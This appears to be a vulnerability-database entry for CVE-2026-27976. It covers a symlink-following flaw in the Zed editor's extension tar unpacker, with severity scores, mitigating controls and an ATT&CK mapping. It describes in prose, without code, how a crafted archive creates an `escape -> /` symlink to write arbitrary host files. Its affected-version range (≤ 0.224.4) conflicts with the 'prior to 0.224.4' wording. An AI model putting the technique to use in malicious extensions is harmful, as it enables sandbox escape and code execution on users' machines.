CVE-2026-27976

HighPublic PoC

Published: 26 February 2026

Published

26 February 2026

Modified

05 March 2026

KEV Added

—

Patch

—

CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS Score 0.0011 28.3th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Description

Zed, a code editor, has an extension installer allows tar/gzip downloads. Prior to version 0.224.4, the tar extractor (`async_tar::Archive::unpack`) creates symlinks from the archive without validation, and the path guard (`writeable_path_from_extension`) only performs lexical prefix checks without resolving symlinks. An…

attacker can ship a tar that first creates a symlink inside the extension workdir pointing outside (e.g., `escape -> /`), then writes files through the symlink, causing writes to arbitrary host paths. This escapes the extension sandbox and enables code execution. Version 0.224.4 patches the issue.

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match

prevent

Requires validation of tar/gzip archive inputs to prevent malicious symlinks from bypassing path guards during extension unpacking.

CM-11 User-installed Software good match

prevent

Restricts and scans user-installed software like Zed extensions to block installation of malicious tar archives exploiting symlink vulnerabilities.

SI-2 Flaw Remediation good match

prevent

Mandates timely flaw remediation by applying patches such as Zed version 0.224.4 to fix the symlink handling and path validation issues.

Security SummaryAI

CVE-2026-27976 is a symlink following vulnerability (CWE-61) in the Zed code editor's extension installer, affecting versions prior to 0.224.4. The issue stems from the tar extractor (`async_tar::Archive::unpack`) creating symlinks from tar/gzip archives without validation, combined with the path guard (`writeable_path_from_extension`) performing only lexical prefix checks without resolving symlinks. This allows malicious archives downloaded during extension installation to bypass sandboxing restrictions.

An attacker can exploit this remotely over the network with no privileges by crafting a tar archive for a malicious extension. The archive first creates a symlink within the extension workdir pointing to an arbitrary host path (e.g., `escape -> /`), followed by files written through that symlink, enabling arbitrary file writes outside the sandbox and potential code execution on the host. Exploitation requires user interaction to install the extension, as indicated by the CVSS v3.1 score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

Zed version 0.224.4 patches the vulnerability by addressing the symlink handling in the extractor and path validation. Additional details are available in the GitHub Security Advisory at https://github.com/zed-industries/zed/security/advisories/GHSA-59p4-3mhm-qm3r.

Details

CWE(s): CWE-61

Affected Products

zed

≤ 0.224.4

MITRE ATT&CK Enterprise TechniquesAI

T1204.002 Malicious File Execution

An adversary may rely upon a user opening a malicious file in order to gain execution.

attack.mitre.org →

Why these techniques?

Symlink validation bypass in extension tar unpacker enables arbitrary file write/RCE when user installs attacker-crafted malicious extension archive (direct match to malicious file execution with UI:R).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

References

https://github.com/zed-industries/zed/security/advisories/GHSA-59p4-3mhm-qm3r
Vendor Advisory, Exploit, Mitigation · security-advisories@github.com